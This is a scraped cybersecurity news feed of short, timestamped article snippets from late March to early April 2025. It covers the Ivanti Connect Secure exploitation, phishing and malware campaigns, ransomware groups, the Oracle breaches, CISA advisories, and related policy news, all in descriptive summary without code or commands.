Ivanti has disclosed details of a now-patched critical security vulnerability impacting its Connect Secure that has come under active exploitation in the wild. The vulnerability, tracked as CVE-2025-22457 (CVSS score: 9.0), concerns a case of a stack-based buffer overflow that could be exploited to execute arbitrary code on affected systems. "A stack-based buffer overflow in Ivanti Connect
Published: 2025-04-04T11:37:00
The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that no less than three cyber attacks were recorded against state administration bodies and critical infrastructure facilities in the country with an aim to steal sensitive data. The campaign, the agency said, involved the use of compromised email accounts to send phishing messages containing links pointing to legitimate
Published: 2025-04-04T10:24:00
A maximum severity security vulnerability has been disclosed in Apache Parquet's Java Library that, if successfully exploited, could allow a remote attacker to execute arbitrary code on susceptible instances. Apache Parquet is a free and open-source columnar data file format that's designed for efficient data processing and retrieval, providing support for complex data, high-performance
Published: 2025-04-04T09:08:00
Law enforcement facing huge gap in 'AI adoption' The National Crime Agency (NCA) will "closely examine" the recommendations made by the Alan Turing Institute after it claimed the UK was ill-equipped to tackle AI-enabled crime.
Published: 2025-04-04T08:30:07
39 Million Secrets Leaked on GitHub in 2024 GitHub found 39M secrets leaked in 2024 and launched new tools to help developers and organizations secure sensitive data in code. Microsoft-owned code hosting platform GitHub announced the discovery of 39 million secrets leaked in 2024. The exposure of this sensitive information poses a serious risk to […]
Published: 2025-04-04T06:48:25
We're not Putin up with this alleged industrial espionage, say the Dutch A Russian national appeared in a Netherlands court on Thursday accused of industrial espionage against ASML, the world's leading manufacturer of chip factory equipment and a key supplier that helps the likes of TSMC pump out top-drawer processors.
Published: 2025-04-04T06:36:14
Australians checking their pensions are melting down call centres and websites Australian retirement fund operators are scrambling after reports emerged of unauthorized access to customer accounts leading to theft of cash.
Published: 2025-04-04T05:48:18
Classification compliance? Records retention requirements? How quaint A US Department of Defense watchdog has opened an investigation into its own Secretary of Defense, Pete Hegseth, over his use of instant-messaging app Signal to discuss government business.
Published: 2025-04-04T00:36:51
Microsoft is warning of several phishing campaigns that are leveraging tax-related themes to deploy malware and steal credentials. "These campaigns notably use redirection methods such as URL shorteners and QR codes contained in malicious attachments and abuse legitimate services like file-hosting services and business profile pages to avoid detection," Microsoft said in a report shared with The
Published: 2025-04-03T23:09:00
Shape shifting technique described as menace to national security The US govt's Cybersecurity Infrastructure Agency, aka CISA, on Thursday urged organizations, internet service providers, and security firms to strengthen defenses against so-called fast flux attacks.
Published: 2025-04-03T22:54:15
Ivanti addressed a critical remote code execution flaw in Connect Secure, which has been exploited since at least mid-March 2025. Ivanti released security updates to address a critical Connect Secure remote code execution vulnerability tracked as CVE-2025-22457. The vulnerability has been exploited by a China-linked threat actor since at least mid-March 2025. Ivanti did not disclose […]
Published: 2025-04-03T19:37:57
Simple denial-of-service blunder turned out to be remote unauth code exec disaster Suspected Chinese government spies have been exploiting a newly disclosed critical bug in Ivanti VPN appliances since mid-March. This is now at least the third time in three years these snoops have been pwning these products.
Published: 2025-04-03T19:14:30
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by
Published: 2025-04-03T17:52:00
The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to date theft and extortion-only attacks. [...]
Published: 2025-04-03T17:06:10
The rules have changed. Again. Artificial intelligence is bringing powerful new tools to businesses. But it's also giving cybercriminals smarter ways to attack. They’re moving quicker, targeting more precisely, and slipping past old defenses without being noticed. And here's the harsh truth: If your security strategy hasn’t evolved with AI in mind, you’re already behind. But you’re not alone and
Published: 2025-04-03T16:55:00
AI holds the promise to revolutionize all sectors of enterprise from fraud detection and content personalization to customer service and security operations. Yet, despite its potential, implementation often stalls behind a wall of security, legal, and compliance hurdles. Imagine this all-too-familiar scenario: A CISO wants to deploy an AI-driven SOC to handle the overwhelming volume of security
Published: 2025-04-03T16:04:00
CISA, the FBI, the NSA, and international cybersecurity agencies are calling on organizations and DNS providers to mitigate the "Fast Flux" cybercrime evasion technique used by state-sponsored threat actors and ransomware gangs. [...]
Published: 2025-04-03T15:37:59
It's going to happen to you one day, so get your ducks in a row As Benjamin Franklin famously said: "An ounce of prevention is worth a pound of cure," and that's especially true when it comes to disaster recovery.
Published: 2025-04-03T15:01:08
An international law enforcement operation shuts down Kidflix, a child sexual abuse material (CSAM) streaming platform with 1.8M users. An international operation, codenamed Operation Stream, against child sexual exploitation shuts down one of the largest streaming platforms that offered child sexual abuse material (CSAM) in the world, Kidflix. The investigation was led by the State […]
Published: 2025-04-03T14:22:23
Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 a
Published: 2025-04-03T14:00:00
Cybersecurity researchers have disclosed details of a new vulnerability impacting Google's Quick Share data transfer utility for Windows that could be exploited to achieve a denial-of-service (DoS) or send arbitrary files to a target's device without their approval. The flaw, tracked as CVE-2024-10668 (CVSS score: 5.9), is a bypass for two of the 10 shortcomings that were originally disclosed by
Published: 2025-04-03T13:51:00
Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025. [...]
Published: 2025-04-03T13:43:34
Counterfeit versions of popular smartphone models that are sold at reduced prices have been found to be preloaded with a modified version of an Android malware called Triada. "More than 2,600 users in different countries have encountered the new version of Triada, the majority in Russia," Kaspersky said in a report. The infections were recorded between March 13 and 27, 2025. Triada is the
Published: 2025-04-03T13:04:00
Espionage? Botnets? Trying to exploit a zero-day? Updated Someone or something is probing devices made by Juniper Networks and Palo Alto Networks, and researchers think it could be evidence of espionage attempts, attempts to build a botnet, or an effort to exploit zero-day vulnerabilities.
Published: 2025-04-03T12:43:08
The State Bar of Texas is warning it suffered a data breach after the INC ransomware gang claimed to have breached the organization and began leaking samples of stolen data. [...]
Published: 2025-04-03T11:43:17
Oracle has finally acknowledged to some customers that attackers have stolen old client credentials after breaching a "legacy environment" last used in 2017. [...]
Published: 2025-04-03T11:26:45
ProtectEU plan wants to have its cake and eat it too The EU has shared its plans to ostensibly keep the continent's denizens secure and among the pages of bureaucratese are a few worrying sections that indicate the political union wants to backdoor encryption by 2026, or even sooner.
Published: 2025-04-03T11:17:46
Threat hunters are warning of a sophisticated web skimmer campaign that leverages a legacy application programming interface (API) from payment processor Stripe to validate stolen payment information prior to exfiltration. "This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect," Jscrambler researchers Pedro
Published: 2025-04-03T10:15:00
Recovery's never been harder in today's tangled, outsourced infrastructure Comment Disaster recovery is getting tougher as IT estates sprawl across on-prem gear, public cloud, SaaS, and third-party ITaaS providers. And it's not floods or fires causing most outages anymore - ransomware now leads the pack, taking down systems faster than any natural disaster.
Published: 2025-04-03T09:31:09
In one of the largest coordinated law enforcement operations, authorities have dismantled Kidflix, a streaming platform that offered child sexual abuse material (CSAM). "A total of 1.8 million users worldwide logged on to the platform between April 2022 and March 2025," Europol said in a statement. "On March 11, 2025, the server, which contained around 72,000 videos at the time, was seized by
Published: 2025-04-03T09:28:00
Stamp it out: Infostealer malware at German outfit may be culprit Britain's Royal Mail is investigating after a crew calling itself GHNA claimed it has put 144GB of the delivery giant's data up for sale, perhaps after acquiring it with the same stolen credentials it used to crack Samsung Germany.
Published: 2025-04-03T06:27:14
A new Triada trojan variant comes preinstalled on Android devices, stealing data on setup, warn researchers from Kaspersky. Kaspersky researchers discovered a new Triada trojan variant preinstalled on thousands of Android devices, enabling data theft upon setup. Kaspersky detected 2,600+ infections in Russia from March 13-27, 2025. The malware was discovered on counterfeit Android devices mimicking […]
Published: 2025-04-03T05:16:20
Double-oh-sh... The name's not Bond. It's O'Brien - Keith O'Brien, now-former global payroll compliance manager at the Dublin, Ireland office of HR software-as-a-service maker Rippling.
Published: 2025-04-02T21:56:22
FIN7 cybercrime group has been linked to Anubis, a Python-based backdoor that provides remote access to compromised Windows systems. The threat actor FIN7, also known as Savage Ladybug, has developed a new Python-based malware, named Anubis Backdoor, which allows attackers to gain full remote control over infected Windows systems. It executes shell commands and system […]
Published: 2025-04-02T21:38:24
Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have allowed a malicious actor to access container images and even inject malicious code. "The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact
Published: 2025-04-02T19:18:00
Bosses say theft now the name of the game with a shift in tactics, apparent branding Big-game ransomware crew Hunters International says its criminal undertaking has become "unpromising, low-converting, and extremely risky," and it is mulling shifting tactics amid an apparent rebrand.
Published: 2025-04-02T19:09:49
A lawyer for Xiaofeng Wang and his wife says they are “safe” after FBI searches of their homes and Wang’s sudden dismissal from Indiana University, where he taught for over 20 years.
Published: 2025-04-02T17:31:26
Introduction As the cybersecurity landscape evolves, service providers play an increasingly vital role in safeguarding sensitive data and maintaining compliance with industry regulations. The National Institute of Standards and Technology (NIST) offers a comprehensive set of frameworks that provide a clear path to achieving robust cybersecurity practices. For service providers, adhering to NIST
Published: 2025-04-02T16:55:00
Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that's known for targeting SSH servers with weak credentials. "Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis
Published: 2025-04-02T16:13:00
When assessing an organization’s external attack surface, encryption-related issues (especially SSL misconfigurations) receive special attention. Why? Their widespread use, configuration complexity, and visibility to attackers as well as users make them more likely to be exploited. This highlights how important your SSL configurations are in maintaining your web application security and
Published: 2025-04-02T15:30:00
Fallout shows how what you say must be central to disaster planning Opinion Oracle is being accused of poor incident comms as it reels from two reported data security mishaps over the past fortnight, amid a reluctance to publicly acknowledge all of the events as well as allegedly deleting evidence from the web.
Published: 2025-04-02T14:54:11
Learn how Infinidat's enterprise cyber storage solutions can enable near-immediate recovery Sponsored Post It's not a question of if your organization gets hit by a cyberattack - only when, and how quickly it recovers.
Published: 2025-04-02T14:46:11
Over 39 million secrets like API keys and account credentials were leaked on GitHub throughout 2024, exposing organizations and users to significant security risks. [...]
Published: 2025-04-02T14:24:54
Microsoft has announced that hotpatch updates are now available for business customers using Windows 11 Enterprise 24H2 on x64 (AMD/Intel) systems, starting today. [...]
Published: 2025-04-02T14:02:31
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Tomcat path equivalence vulnerability, tracked as CVE-2025-24813, to its Known Exploited Vulnerabilities (KEV) catalog. The Apache Tomcat vulnerability CVE-2025-24813 was recently disclosed and is being actively exploited just 30 […]
Published: 2025-04-02T13:47:39
The financially motivated threat actor known as FIN7 has been linked to a Python-based backdoor called Anubis (not to be confused with an Android banking trojan of the same name) that can grant them remote access to compromised Windows systems. "This malware allows attackers to execute remote shell commands and other system operations, giving them full control over an infected machine," Swiss
Published: 2025-04-02T12:22:00
Organizational, technological resilience combined defeat the disease that is cybercrime When IT disasters strike, it can become a matter of life and death for healthcare organizations and criminals know it.
Published: 2025-04-02T11:36:11
Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. "Hijack Loader released a new module that implements call stack spoofing to hide the origin of function calls (e.g., API and system calls)," Zscaler ThreatLabz researcher Muhammed Irfan V A said in
Published: 2025-04-02T11:25:00
Victims expect to spend considerable time and money over privacy incident, lawyers argue Specialist class action lawyers have launched proceedings against Oracle in Texas over two alleged data breaches.
Published: 2025-04-02T10:54:19
Tip-lipped for 30 years before becoming an 'unrivaled advocate' for the site Obit Betty Webb MBE, one of the team who worked at the code-breaking Bletchley Park facility in England during the Second World War, has died at the age of 101.
Published: 2025-04-02T09:36:49
Apple backports three critical vulnerabilities actively exploited in attacks against older iOS and macOS models. Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions. The three vulnerabilities are: Apple released the following updates: that are available for the following devices: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs hacking, newsletter)
Published: 2025-04-02T08:52:53
Hackers are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely preparing for targeted attacks. Researchers at the threat intelligence firm GreyNoise warn of hackers that are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely preparing for targeted attacks, warns threat intelligence firm GreyNoise. GreyNoise reports that over 24,000 unique IP addresses […]
Published: 2025-04-02T07:29:05
Cupertino already squashed 'em in more recent releases - which this week get a fresh round of fixes Apple has delivered a big batch of OS updates, some of which belatedly patch older versions of its operating systems to address exploited-in-the-wild flaws the iGiant earlier fixed in more recent releases.
Published: 2025-04-02T06:13:09
With help from UK operatives, because it's getting tougher to run the scam in the USA North Korea's scamming, thieving, and AI-abusing fake IT workers are increasingly targeting European employers.
Published: 2025-04-02T05:58:08
But his emails! Sharing them with Google! Senior members of the US National Security Council, including the White House national security adviser Michael Waltz, have been accused of using their personal Gmail accounts to exchange sensitive information.
Published: 2025-04-02T01:36:09
Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as
Published: 2025-04-01T22:38:00
On the 21st birthday of Gmail, Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) to any user in any email inbox in a few clicks. The feature is rolling out starting today in beta, allowing users to send E2EE emails to Gmail users within an organization, with plans to send E2EE emails to any Gmail inbox in the coming weeks and to any email inbox
Published: 2025-04-01T21:04:00
A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid's unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. "Its scalable,
Published: 2025-04-01T19:48:00
Last week, National Security Advisor Michael Waltz inadvertently invited a journalist to a Signal chat discussing a planned military strike. Today, a new Washington Post report says that he has also discussed sensitive military positions and powerful weapons systems relating to an ongoing conflict, using his personal Gmail account. Waltz, along with other members of […] 
Last week, National Security Advisor Michael Waltz inadvertently invited a journalist to a Signal chat discussing a planned military strike. Today, a new Washington Post report says that he has also discussed “sensitive military positions and power...
Published: 2025-04-01T18:59:13
Microsoft’s offensive security team discovered a critical code execution vulnerability impacting Canon printer drivers. Researchers at Microsoft’s Offensive Research and Security Engineering (MORSE) team have discovered a critical code execution vulnerability, tracked as CVE-2025-1268 (CVSS score of 9.4), impacting Canon printer drivers. The vulnerability is an out-of-bounds issue that resides in certain printer drivers for […]
Published: 2025-04-01T18:32:12
Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate
Published: 2025-04-01T16:58:00
Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly 24,000 unique IP addresses attempting to access these portals. "This pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation," threat
Published: 2025-04-01T16:47:00
Explore how relying on CSRF tokens as a security measure against CSRF attacks is a recommended best practice, but in some cases, they are simply not enough. Introduction As per the Open Web Application Security Project (OWASP), CSRF vulnerabilities are recognized as a significant threat and are historically part of their top risks. The implications of CSRF attacks are far-reaching and could
Published: 2025-04-01T16:33:00
Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail in the Asia-Pacific (APAC) and Latin American (LATAM) regions. "The first sighting of its activity was in the second quarter of 2023; back then, it was
Published: 2025-04-01T16:33:00
Copilot told us that half a century is 25 years. It feels much longer Microsoft will officially hit the half-century mark on Friday as the Windows giant turns 50 years old. What do you consider the highs and lows of the company's journey to dominance?
Published: 2025-04-01T15:32:08
Attackers exploit CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […]
Published: 2025-04-01T14:09:54
The UK government must be thrilled Google will soon offer end-to-end encrypted (E2EE) email for all users, even those who do not use Google Workspace, and says it'll do so without imposing any undue stress on IT admins.
Published: 2025-04-01T13:00:13
Tech secretary reveals landmark legislation's full details for first time The UK's technology secretary revealed the full breadth of the government's Cyber Security and Resilience (CSR) Bill for the first time this morning, pledging 100,000 ($129,000) daily fines for failing to act against specific threats under consideration.
Published: 2025-04-01T11:37:23
Apple has been hit with a fine of 150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency (ATT) privacy framework. The Autorit de la concurrence said it's imposing a financial penalty against Apple for abusing its dominant position as a distributor of mobile applications for iOS and iPadOS devices between April 26, 2021 and July 25,
Published: 2025-04-01T11:17:00
Google is updating Gmail to allow enterprise users to send encrypted messages to any inbox in just a few clicks. Google says it's developed a new encryption model that, unlike the current encryption feature on Gmail, doesn t require senders or recipients to use custom software or exchange encryption certificates. The feature is rolling out in […] 
Google is updating Gmail to allow enterprise users to send encrypted messages to any inbox in just a few clicks. Google says it’s developed a new encryption model that, unlike the current encryption feature on Gmail, doesn’t require senders or reci...
Published: 2025-04-01T09:00:00
Not exactly Snowden levels of skill A student at Britain's top eavesdropping government agency has pleaded guilty to taking sensitive information home on the first day of his trial.
Published: 2025-04-01T08:51:54
Resurge an apt name for malware targeting hardware maker that has security bug after security bug Owners of Ivanti's Connect Secure, Policy Secure, and ZTA Gateway products have a new strain of malware to fend off, according to the US Cybersecurity and Infrastructure Security Agency, aka CISA.
Published: 2025-04-01T01:09:08
Indiana Uni rm -rf online profiles while agents haul boxes of evidence Updated A tenured computer security professor at Indiana University and his university-employed wife have not been seen publicly since federal agents raided their homes late last week.
Published: 2025-03-31T23:16:39
The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of
Published: 2025-03-31T22:11:00
1990s incident response in 2025 Two Oracle data security breaches have been reported in the past week, and the database goliath not only remains reluctant to acknowledge the disasters publicly it may be scrubbing the web of evidence, too.
Published: 2025-03-31T21:30:00
Xiaofeng Wang, a longtime computer science professor at Indiana University, has disappeared along with his wife, and their profiles on the school's website were wiped ahead of recent FBI raids.
Published: 2025-03-31T19:42:00
Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
Published: 2025-03-31T17:34:00
Every week, someone somewhere slips up and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights and the unexpected
Published: 2025-03-31T16:55:00
Explanation leaves a 'lot of questions unanswered,' says infosec researcher A digital burglar is claiming to have nabbed a trove of "highly sensitive" data from Check Point - something the American-Israeli security biz claims is a huge exaggeration.
Published: 2025-03-31T16:35:09
If you're using AWS, it's easy to assume your cloud security is handled - but that's a dangerous misconception. AWS secures its own infrastructure, but security within a cloud environment remains the customer’s responsibility. Think of AWS security like protecting a building: AWS provides strong walls and a solid roof, but it's up to the customer to handle the locks, install the alarm systems,
Published: 2025-03-31T16:30:00
Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to
Published: 2025-03-31T15:00:00
Think AWS has security covered? Think again. Discover real-world examples of what it doesn't secure and how to protect your environment Partner Content AWS customers might assume that security is taken care of for them - however, this is a dangerous misconception.
Published: 2025-03-31T10:00:09
An unsecured database used by a generative AI app revealed prompts and tens of thousands of explicit images some of which are likely illegal. The company deleted its websites after WIRED reached out.
Published: 2025-03-31T10:00:00
PLUS: Indonesia crimps social media, allows iPhones; India claims rocket boost; In-flight GenAI for Japan Airlines Asia In Brief China last week commenced a crackdown on inappropriate collection and subsequent use of personal information.
Published: 2025-03-31T00:30:14
PLUS: OpenAI bumps bug bounties bigtime; INTERPOL arrests 300 alleged cyber-scammers; And more! Infosec in brief Oracle Health appears to have fallen victim to an info stealing attack that has led to patient data stored by American hospitals being plundered.
Published: 2025-03-30T22:45:12
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. "RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that
Published: 2025-03-30T10:37:00
A safe and proper rewrite should take years not months. The so-called Department of Government Efficiency (DOGE) is starting to put together a team to migrate the Social Security Administration’s (SSA) computer
Published: 2025-03-29T14:08:49
Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey. "Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,"
Published: 2025-03-29T12:58:00
Miscreants warming to Delphi, Haskell, and the like to evade detection Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.
Published: 2025-03-29T10:50:05
Miscreants warming to Delphi, Haskell, and the like to evade detection Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.
Published: 2025-03-29T10:50:05
Plus: Alleged Snowflake hacker will be extradited to US, internet restrictions create an information vacuum in Myanmar, and London gets its first permanent face recognition cameras.
Published: 2025-03-29T10:30:00
In what's an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract
Published: 2025-03-29T09:22:00
Alleged breaches affect Oracle Cloud and Oracle Health. Oracle isn’t commenting on recent reports that it has experienced two separate data breaches that have exposed sensitive personal information belonging to
Published: 2025-03-28T19:41:14
Cybersecurity researchers have disclosed 46 new security flaws in products from three solar power system vendors, Sungrow, Growatt, and SMA, that could be exploited by a bad actor to seize control of devices or execute code remotely, posing severe risks to electrical grids. The vulnerabilities have been collectively codenamed SUN:DOWN by Forescout Vedere Labs. "The new vulnerabilities can
Published: 2025-03-28T18:51:00
Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads. The malware, according to Zscaler ThreatLabz, shares behavioral similarities with another known malware loader known as SmokeLoader. "The purpose of the malware is to download and execute second-stage payloads while evading
Published: 2025-03-28T17:27:00
Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is
Published: 2025-03-28T15:45:00
An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. "PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices," Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first
Published: 2025-03-28T13:36:00
A concert on Monday night at New York's Radio City Music Hall was a special occasion for Frank Miller: his parents wedding anniversary. He didn t end up seeing the show and before he could even get past security, he was informed that he was in fac
Published: 2025-03-28T13:10:41
Department director admits Welsh capital's council still trying to get heads around threat of dark web leaks Cardiff City Council's director of children's services says data was leaked or stolen from the organization, although she did not clarify how or what was pilfered.
Published: 2025-03-28T12:28:14
Similar issue in Windows 11 resolved as of Wednesday Microsoft is warning that a faulty patch pushed out in February is causing Windows Server 2025 Remote Desktop sessions to freeze under certain circumstances.
Published: 2025-03-28T11:37:06
Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems. "Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers," Sonatype researcher Ax Sharma said. "However, [...] the latest
Published: 2025-03-28T11:36:00
Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. "Following the recent Chrome sandbox escape (
Published: 2025-03-28T11:14:00
Hacking LLMs has always been more art than science. A new attack on Gemini could change that. In the growing canon of AI security, the indirect prompt injection has emerged as the most powerful means for attacke
Published: 2025-03-28T11:00:58
Single click on a phishing link in Google browser blew up sandbox on Windows Google pushed out an emergency patch for Chrome on Windows this week to stop attackers exploiting a sandbox-breaking zero-day vulnerability, seemingly used by snoops to target certain folks in Russia.
Published: 2025-03-28T06:34:11
WOW! DID! SOMEONE! REALLY! STEAL! DATA! ON! 400K! USERS?! A cyber-crime ring calling itself Arkana has made a cringe music video to boast of an alleged theft of subscriber account data from Colorado-based cableco WideOpenWest (literally, WOW!)
Published: 2025-03-28T01:17:11
Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind
Published: 2025-03-27T22:28:00
Crew also cooked up two fresh SparrowDoor backdoor variants, says ESET The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.
Published: 2025-03-27T22:06:58
WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.
Published: 2025-03-27T21:47:31
A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of a custom tool that's designed to disable endpoint detection and response (EDR) software on compromised hosts, according to ESET. The EDR killing tool, dubbed EDRKillShifter, was first documented as used by RansomHub actors in
Published: 2025-03-27T19:40:00
Scandal surrounding the Trump administration’s Signal group chat has led to a landmark week for the encrypted messaging app’s adoption its “largest US growth moment by a massive margin.”
Published: 2025-03-27T18:31:30
An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as
Published: 2025-03-27T18:01:00
Whether it’s CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. Organizations often rely on traditional CASB solutions for protecting against malicious access and data exfiltration, but these fall short for protecting against shadow SaaS, data damage, and more. A new report, Understanding SaaS Security Risks: Why
Published: 2025-03-27T16:55:00
Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you ... 
Published: 2025-03-27T16:39:49
Researchers say 'proactive' approach is needed to combat global cybercrime Here's one you don't see every day: A cybersecurity vendor is admitting to breaking into a notorious ransomware crew's infrastructure and gathering data it relayed to national agencies to help victims.
Published: 2025-03-27T16:32:09
Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1.
Published: 2025-03-27T15:30:00
An ongoing campaign that infiltrates legitimate websites with malicious JavaScript injects to promote Chinese-language gambling platforms has ballooned to compromise approximately 150,000 sites to date. "The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor's browser," c/side security analyst Himanshu
Published: 2025-03-27T13:43:00
Screenshot shows company head unhappy, claiming 'real CVE is pending' CrushFTP's CEO is not happy with VulnCheck after the CVE numbering authority (CNA) released an unofficial ID for the critical vulnerability in its file transfer tech disclosed almost a week ago.
Published: 2025-03-27T13:20:10
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two six-year-old security flaws impacting Sitecore CMS and Experience Platform (XP) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2019-9874 (CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF
Published: 2025-03-27T11:53:00
A critical security flaw has been disclosed in NetApp SnapCenter that, if successfully exploited, could allow privilege escalation. SnapCenter is an enterprise-focused software that's used to manage data protection across applications, databases, virtual machines, and file systems, offering the ability to backup, restore, and clone data resources. The vulnerability, tracked as
Published: 2025-03-27T11:36:00
As if living in Croydon wasn't bad enough The Metropolitan Police has confirmed its first permanent installation of live facial recognition (LFR) cameras is coming this summer and the lucky location will be the South London suburb of Croydon.
Published: 2025-03-27T10:27:31
